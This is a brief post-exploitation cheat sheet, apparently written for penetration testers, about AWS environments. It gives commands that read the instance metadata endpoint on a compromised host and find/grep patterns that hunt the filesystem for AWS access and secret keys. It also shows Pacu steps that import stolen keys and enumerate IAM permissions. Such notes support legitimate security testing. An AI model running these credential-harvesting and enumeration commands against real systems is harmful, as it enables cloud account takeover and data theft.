Post Exploitation

This is a good place to start if you've got credentials.

Set credentials for AWS cli

Add the credentials to ~/.aws/credentials. It should look something like this:

[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token=AQoDYXdzEJr...<remainder of security token>

Make sure to set the proper region as well in ~/.aws/config, which you can get using this command on the compromised instance:

curl http://169.254.169.254/latest/dynamic/instance-identity/document

An alternative with wget:

wget -O - -q http://169.254.169.254/latest/dynamic/instance-identity/document

It should look something like this (the region will obviously vary):

[default]
region = us-east-2

Search for aws keys in bash scripts

find / -name '*.sh' -exec grep -HE "([^A-Z0-9]|^)AKIA[A-Z0-9]{12,}" {} \;

Resource:
https://twitter.com/omespino/status/1242977678329819141?s=20

Pacu

Set the keys

This will use the keys in ~/.aws/credentials from the default region:

import_keys default

Set the region

This will set the region to us-east-2:

set_regions us-east-2

Verify credentials

whoami

List modules

ls

Run module

This will run a module to enumerate permissions the current account has:

run iam__enum_permissions

Search for access keys with grep

Access key:

grep -RP '(?<![A-Z0-9])[A-Z0-9]{20}(?![A-Z0-9])' * 2>/dev/null

Secret access key:

grep -RP '(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])' * 2>/dev/null

Resource:
https://gist.github.com/hsuh/88360eeadb0e8f7136c37fd46a62ee10